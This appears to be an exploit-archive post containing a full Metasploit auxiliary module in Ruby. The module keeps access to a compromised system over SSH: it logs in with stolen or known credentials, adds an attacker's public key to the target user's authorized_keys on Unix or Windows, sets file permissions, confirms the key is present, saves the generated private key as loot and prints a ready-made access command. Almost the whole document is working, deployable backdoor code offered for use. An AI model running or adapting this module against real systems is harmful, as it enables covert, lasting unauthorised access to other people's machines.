OpenSSH 10.2p1 Authorized Keys Persistence Tool
=============================================================================================================================================
| # Title OpenSSH 10.2p1 Authorized Keys Persistence Tool
=============================================================================================================================================
| # Title : OpenSSH 10.2p1 Authorized Keys Persistence via Valid Credentials |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.openssh.com/ |
=============================================================================================================================================
[+] References :
[+] Summary : This Metasploit Auxiliary module establishes persistent access to remote systems by adding an SSH public key to a target user?s authorized_keys file after successful authentication.
The module requires valid SSH credentials (password or private key) and supports both Unix-like and Windows SSH environments.
It automatically detects the target platform, locates the appropriate authorized_keys file, safely deploys the key using atomic operations, enforces correct permissions, and optionally verifies persistence.
This technique aligns with MITRE ATT&CK T1098.004 (Account Manipulation: SSH Authorized Keys) and represents a post-authentication persistence mechanism, not an exploit
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SSH Authorized Keys Persistence',
'Description' => %q{
This module adds SSH public keys to authorized_keys files on remote
SSH servers to establish persistent access.
The module requires valid SSH credentials (password or private key)
and will add the specified public key to the target user's
authorized_keys file.
This is a persistence technique, not an exploit.
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'References' => [
['URL', 'https://attack.mitre.org/techniques/T1098/004/'],
['URL', 'https://www.ssh.com/academy/ssh/authorized_keys']
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(22),
OptString.new('USERNAME', [true, 'Username to authenticate with']),
OptString.new('PASSWORD', [false, 'Password for authentication']),
OptPath.new('SSH_PRIVATE_KEY', [false, 'SSH private key for authentication']),
OptBool.new('GENERATE_KEYS', [false, 'Generate new SSH keys for persistence', true]),
OptString.new('KEY_NAME', [false, 'Name for generated keys', 'msf_backdoor']),
OptBool.new('VERIFY_PERSISTENCE', [false, 'Verify persistence after deployment', true]),
OptString.new('CUSTOM_KEY', [false, 'Custom public key to deploy'])
])
register_advanced_options([
OptInt.new('SSH_TIMEOUT', [false, 'SSH connection timeout', 30]),
OptBool.new('ACCEPT_HOSTKEY', [false, 'Accept unknown SSH host keys', false])
])
end
def run
@results = {
generated_keys: {},
deployed_keys: [],
errors: []
}
print_status("Starting SSH Key Persistence against #{rhost}:#{rport}")
begin
public_key = setup_persistence_keys
if public_key.nil?
print_error("Failed to setup persistence keys")
return
end
success = deploy_key_to_user(public_key)
if success
print_good("Persistence successfully established")
else
print_error("Failed to establish persistence")
end
generate_report
rescue ::Timeout::Error
print_error("Connection timed out")
rescue ::Net::SSH::Exception => e
print_error("SSH Error: #{e.class} - #{e.message}")
rescue ::Exception => e
print_error("Module failed: #{e.class} - #{e.message}")
print_error("Backtrace: #{e.backtrace.join("\n")}") if datastore['VERBOSE']
end
end
def check
print_status("Checking SSH service on #{rhost}:#{rport}")
begin
test_username = Rex::Text.rand_text_alpha(8)
ssh_opts = {
'RHOST' => rhost,
'RPORT' => rport,
'USERNAME' => test_username,
'PASSWORD' => Rex::Text.rand_text_alphanumeric(16),
'SSH_TIMEOUT' => 10,
'VERBOSE' => false
}
if datastore['ACCEPT_HOSTKEY']
ssh_opts['VERIFY_HOST_KEY'] = :never
end
ssh = connect_ssh(false, ssh_opts)
if ssh
ssh.close
print_good("SSH service is accessible and accepts connections")
return Exploit::CheckCode::Appears
else
print_warning("SSH service responded but authentication failed")
return Exploit::CheckCode::Appears
end
rescue Net::SSH::AuthenticationFailed
print_good("SSH service accepts connections (authentication failed as expected)")
return Exploit::CheckCode::Appears
rescue Net::SSH::ConnectionTimeout
print_error("SSH connection timeout")
return Exploit::CheckCode::Safe
rescue Net::SSH::Disconnect => e
print_warning("SSH disconnected: #{e.message}")
return Exploit::CheckCode::Unknown
rescue => e
vprint_error("SSH check error: #{e.class} - #{e.message}")
return Exploit::CheckCode::Unknown
end
end
def setup_persistence_keys
if datastore['CUSTOM_KEY'] && !datastore['CUSTOM_KEY'].empty?
return validate_and_load_custom_key(datastore['CUSTOM_KEY'])
elsif datastore['GENERATE_KEYS']
return generate_exploit_keys
elsif datastore['SSH_PRIVATE_KEY'] && File.exist?(datastore['SSH_PRIVATE_KEY'])
return extract_public_key_from_private(datastore['SSH_PRIVATE_KEY'])
else
print_error("No key source specified. Use GENERATE_KEYS, CUSTOM_KEY, or SSH_PRIVATE_KEY")
return nil
end
end
def generate_exploit_keys
print_status("Generating persistence keypair")
begin
require 'sshkey'
sshkey = SSHKey.generate(
type: 'RSA',
bits: 4096,
comment: "msf_#{Time.now.to_i}"
)
loot_path = store_loot(
'ssh.private.key',
'text/plain',
rhost,
sshkey.private_key,
"#{datastore['KEY_NAME']}.pem",
'SSH Private Key'
)
store_loot(
'ssh.public.key',
'text/plain',
rhost,
sshkey.ssh_public_key,
"#{datastore['KEY_NAME']}.pub",
'SSH Public Key'
)
cred_data = {
origin_type: :service,
address: rhost,
port: rport,
service_name: 'ssh',
private_type: :ssh_key,
private_data: sshkey.private_key,
username: datastore['USERNAME'],
workspace_id: myworkspace_id
}
create_credential(cred_data)
@results[:generated_keys] = {
private_key_path: loot_path,
public_key: sshkey.ssh_public_key,
fingerprint: sshkey.fingerprint
}
print_good("Generated persistence keypair")
print_good(" Private key: #{loot_path}")
print_good(" Fingerprint: #{sshkey.fingerprint}")
return sshkey.ssh_public_key
rescue => e
print_error("Failed to generate keys: #{e.message}")
return nil
end
end
def validate_and_load_custom_key(key_string)
unless key_string.strip =~ /^ssh-(rsa|dss|ed25519|ecdsa-sha2-nistp(256|384|521)) /
print_error("Invalid SSH public key format")
return nil
end
print_status("Using custom public key")
return key_string.strip
end
def extract_public_key_from_private(private_key_path)
begin
require 'sshkey'
private_key = File.read(private_key_path)
sshkey = SSHKey.new(private_key)
print_status("Extracted public key from private key")
return sshkey.ssh_public_key
rescue => e
print_error("Failed to extract public key: #{e.message}")
return nil
end
end
def deploy_key_to_user(public_key)
username = datastore['USERNAME']
password = datastore['PASSWORD']
ssh_key = datastore['SSH_PRIVATE_KEY']
print_status("Deploying persistence key for #{username}")
ssh = establish_ssh_connection(username, password, ssh_key)
return false unless ssh
begin
platform = detect_platform(ssh)
print_status("Detected platform: #{platform}")
auth_keys_path = get_auth_keys_path(username, platform, ssh)
return false unless auth_keys_path
print_status("Target authorized_keys file: #{auth_keys_path}")
success = deploy_key_atomically(ssh, auth_keys_path, public_key, username, platform)
if success
print_good("Key deployed to #{auth_keys_path}")
@results[:deployed_keys] << {
username: username,
path: auth_keys_path,
platform: platform,
timestamp: Time.now.to_s
}
return true
else
print_error("Failed to deploy key")
return false
end
ensure
ssh.close if ssh
end
end
def establish_ssh_connection(username, password, ssh_key)
ssh_opts = {
'RHOST' => rhost,
'RPORT' => rport,
'USERNAME' => username,
'SSH_TIMEOUT' => datastore['SSH_TIMEOUT'],
'VERBOSE' => false
}
if datastore['ACCEPT_HOSTKEY']
ssh_opts['VERIFY_HOST_KEY'] = :never
end
if ssh_key && File.exist?(ssh_key)
ssh_opts['KEY_FILE'] = ssh_key
elsif password
ssh_opts['PASSWORD'] = password
else
print_error("No authentication method specified")
return nil
end
ssh = connect_ssh(true, ssh_opts)
if ssh
begin
channel_test = ssh.open_channel do |ch|
ch.exec "true"
ch.on_request("exit-status") do |ch2, data|
print_good("SSH connection established and active")
end
end
ssh.loop(0.1)
return ssh
rescue => e
vprint_error("Channel test failed: #{e.message}")
print_good("SSH connection established (channel test optional)")
return ssh
end
else
print_error("Failed to establish SSH connection")
return nil
end
rescue Net::SSH::AuthenticationFailed
print_error("Authentication failed for #{username}")
return nil
rescue Net::SSH::ConnectionTimeout
print_error("Connection timeout for #{username}")
return nil
rescue Net::SSH::HostKeyMismatch => e
print_error("Host key mismatch: #{e.fingerprint}")
print_error("Set ACCEPT_HOSTKEY to true to accept unknown host keys")
return nil
rescue => e
print_error("SSH connection error: #{e.message}")
return nil
end
end
def detect_platform(ssh)
unix_indicators = [
"which bash 2>/dev/null",
"test -d /usr && echo UNIX",
"test -d /etc && echo UNIX",
"ls /proc 2>/dev/null && echo UNIX",
"uname -s 2>/dev/null"
]
unix_indicators.each do |cmd|
result = ssh.exec!(cmd)
if result && result.include?('UNIX')
return :unix
elsif result && !result.strip.empty? && cmd.include?('uname')
return :unix
end
end
windows_indicators = [
"cmd /c \"if exist C:\\Windows\\System32 echo WINDOWS\"",
"powershell -Command \"if (Test-Path 'C:\\Windows') { Write-Output 'WINDOWS' }\" 2>$null",
"wmic os get caption 2>nul | findstr /i windows"
]
windows_indicators.each do |cmd|
result = ssh.exec!(cmd)
if result && result.include?('WINDOWS')
return :windows
end
end
cygwin_check = ssh.exec!("uname -o 2>/dev/null")
if cygwin_check
result_lower = cygwin_check.downcase.strip
if result_lower.include?('cygwin') || result_lower.include?('mingw')
return :windows_cygwin
end
end
print_warning("Could not detect platform, defaulting to Unix")
:unix
end
def get_auth_keys_path(username, platform, ssh)
case platform
when :windows, :windows_cygwin
locations = [
"C:/Users/#{username}/.ssh/authorized_keys",
"/home/#{username}/.ssh/authorized_keys",
"C:/ProgramData/ssh/administrators_authorized_keys"
]
locations.each do |path|
dir = File.dirname(path)
if ensure_directory_exists(ssh, dir, username, platform)
if path.include?('ProgramData')
print_warning("System authorized_keys location requires special permissions")
print_warning("SSH may ignore this file if ACLs are not correctly set")
end
return path
end
end
return "C:/Users/#{username}/.ssh/authorized_keys"
when :unix
home_cmds = [
"getent passwd #{username} 2>/dev/null | cut -d: -f6",
"eval echo ~#{username} 2>/dev/null",
"awk -F: -v user=#{username} '$1 == user {print $6}' /etc/passwd 2>/dev/null",
"perl -e '@u=getpwnam(\"#{username}\"); print \$u[7] if @u;' 2>/dev/null",
"python3 -c \"import pwd; print(pwd.getpwnam('#{username}').pw_dir)\" 2>/dev/null",
"python -c \"import pwd; print(pwd.getpwnam('#{username}').pw_dir)\" 2>/dev/null"
]
home_dir = nil
home_cmds.each do |cmd|
result = ssh.exec!(cmd)
if result && !result.strip.empty? && result.strip != "~#{username}"
home_dir = result.strip
break
end
end
if home_dir
return "#{home_dir}/.ssh/authorized_keys"
else
if username == 'root'
return '/root/.ssh/authorized_keys'
else
return "/home/#{username}/.ssh/authorized_keys"
end
end
else
print_error("Cannot determine authorized_keys path for platform: #{platform}")
return nil
end
end
def deploy_key_atomically(ssh, path, public_key, username, platform)
clean_key = public_key.strip
print_status("Deploying key to: #{path}")
dir = File.dirname(path)
unless ensure_directory_exists(ssh, dir, username, platform)
print_error("Failed to create directory for #{path}")
return false
end
if platform != :windows
ssh.exec!("umask 077 2>/dev/null")
end
if file_exists?(ssh, path, platform)
unless create_backup(ssh, path, platform)
print_warning("Failed to create backup")
end
end
existing_keys = []
if file_exists?(ssh, path, platform)
existing_keys = read_authorized_keys(ssh, path, platform)
end
existing_keys.each do |existing_key|
if existing_key.strip == clean_key
print_warning("Key already exists at #{path}")
return true
end
end
existing_keys << clean_key
success = write_authorized_keys_atomically(ssh, path, existing_keys, platform)
unless success
print_error("Failed to write keys to #{path}")
return false
end
unless set_file_permissions(ssh, path, username, platform)
print_warning("Failed to set permissions on #{path}")
end
if datastore['VERIFY_PERSISTENCE']
unless verify_key_deployment(ssh, path, clean_key, platform)
print_error("Verification failed: Key not found in #{path}")
return false
end
print_good("Verification successful: Key found in #{path}")
end
true
end
def read_authorized_keys(ssh, path, platform)
keys = []
if platform == :windows
cmd = "type \"#{path}\" 2>nul"
content = ssh.exec!(cmd)
if content
content.each_line do |line|
stripped = line.strip
keys << stripped unless stripped.empty? || stripped.start_with?('#')
end
end
else
cmd = "cat \"#{path}\" 2>/dev/null"
content = ssh.exec!(cmd)
if content
content.each_line do |line|
stripped = line.strip
keys << stripped unless stripped.empty? || stripped.start_with?('#')
end
end
end
keys
end
def write_authorized_keys_atomically(ssh, path, keys, platform)
if platform == :windows
temp_path = "#{path}.tmp#{rand(10000)}"
temp_content = keys.join("\n") + "\n"
escaped_content = temp_content.gsub('"', '\"')
methods = [
"powershell -Command \"'#{escaped_content.gsub("'", "''")}' | Out-File -FilePath '#{temp_path}' -Encoding UTF8 -Force 2>$null\"",
"echo #{escaped_content} > \"#{temp_path}\""
]
success = false
methods.each do |cmd|
ssh.exec!(cmd)
if file_exists?(ssh, temp_path, platform)
success = true
break
end
end
if success
cmd = "move /Y \"#{temp_path}\" \"#{path}\" >nul 2>&1"
ssh.exec!(cmd)
return file_exists?(ssh, path, platform)
end
return false
else
temp_path = "#{path}.tmp.#{rand(10000)}"
temp_content = keys.join("\n") + "\n"
escaped_content = temp_content.gsub("'", "'\"'\"'")
cmd = "printf '%s' '#{escaped_content}' > '#{temp_path}' 2>/dev/null"
ssh.exec!(cmd)
unless file_exists?(ssh, temp_path, platform)
return false
end
ssh.exec!("mv -f '#{temp_path}' '#{path}' 2>/dev/null")
return file_exists?(ssh, path, platform)
end
end
def file_exists?(ssh, path, platform)
if platform == :windows
cmd = "if exist \"#{path}\" (echo EXISTS) else (echo NOT_EXISTS)"
else
cmd = "test -f \"#{path}\" && echo EXISTS || echo NOT_EXISTS"
end
result = ssh.exec!(cmd)
result && result.strip == 'EXISTS'
end
def directory_exists?(ssh, path, platform)
if platform == :windows
cmd = "if exist \"#{path}\" (echo EXISTS) else (echo NOT_EXISTS)"
else
cmd = "test -d \"#{path}\" && echo EXISTS || echo NOT_EXISTS"
end
result = ssh.exec!(cmd)
result && result.strip == 'EXISTS'
end
def ensure_directory_exists(ssh, dir, username, platform)
return true if dir.empty? || dir == '.' || dir == '/'
return true if directory_exists?(ssh, dir, platform)
if platform == :windows
cmd = "mkdir \"#{dir}\" 2>nul"
else
cmd = "mkdir -p \"#{dir}\" 2>/dev/null"
end
ssh.exec!(cmd)
if directory_exists?(ssh, dir, platform)
if platform != :windows
ssh.exec!("chmod 700 \"#{dir}\" 2>/dev/null")
ssh.exec!("chown #{username} \"#{dir}\" 2>/dev/null || true")
end
return true
end
false
end
def create_backup(ssh, path, platform)
timestamp = Time.now.to_i
backup_path = "#{path}.backup_#{timestamp}"
if platform == :windows
cmd = "copy \"#{path}\" \"#{backup_path}\" >nul 2>&1"
else
cmd = "cp -p \"#{path}\" \"#{backup_path}\" 2>/dev/null"
end
ssh.exec!(cmd)
if file_exists?(ssh, backup_path, platform)
print_status("Created backup: #{backup_path}")
return true
else
print_warning("Backup creation failed")
return false
end
end
def set_file_permissions(ssh, path, username, platform)
if platform == :windows
remove_inherit = "icacls \"#{path}\" /inheritance:r 2>nul"
ssh.exec!(remove_inherit)
commands = [
"icacls \"#{path}\" /grant:r \"SYSTEM\":F 2>nul",
"icacls \"#{path}\" /grant:r \"*S-1-5-32-544\":F 2>nul" # Administrators group
]
commands << "icacls \"#{path}\" /grant:r \"#{username}\":F 2>nul"
commands.each do |cmd|
ssh.exec!(cmd)
end
return true
elsif platform == :windows_cygwin
ssh.exec!("chmod 600 \"#{path}\" 2>/dev/null")
return true
else
dir = File.dirname(path)
if dir != '.' && dir != '/'
ssh.exec!("chmod 700 \"#{dir}\" 2>/dev/null")
# Use chown without group for better compatibility
ssh.exec!("chown #{username} \"#{dir}\" 2>/dev/null || true")
end
ssh.exec!("chmod 600 \"#{path}\" 2>/dev/null")
ssh.exec!("chown #{username} \"#{path}\" 2>/dev/null || true")
return true
end
end
def verify_key_deployment(ssh, path, full_key, platform)
return false unless file_exists?(ssh, path, platform)
keys = read_authorized_keys(ssh, path, platform)
keys.each do |key|
return true if key.strip == full_key
end
false
end
def generate_report
return if @results[:deployed_keys].empty?
print_status("Generating persistence report")
report_data = {
module: self.name,
target: "#{rhost}:#{rport}",
timestamp: Time.now.to_s,
results: @results
}
begin
loot_path = store_loot(
'ssh.persistence.report',
'application/json',
rhost,
JSON.pretty_generate(report_data),
"ssh_persistence_#{rhost}_#{Time.now.to_i}.json",
'SSH Persistence Report'
)
print_good("Report saved: #{loot_path}")
rescue => e
print_error("Failed to save report: #{e.message}")
end
print_line("=" * 60)
print_status("PERSISTENCE ESTABLISHED")
print_line("=" * 60)
@results[:deployed_keys].each do |deployment|
print_good("User: #{deployment[:username]}")
print_good(" Key location: #{deployment[:path]}")
print_good(" Platform: #{deployment[:platform]}")
if @results[:generated_keys][:private_key_path]
print_good(" Access command:")
print_good(" ssh -i #{@results[:generated_keys][:private_key_path]} #{deployment[:username]}@#{rhost}")
end
end
print_line("=" * 60)
end
end
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================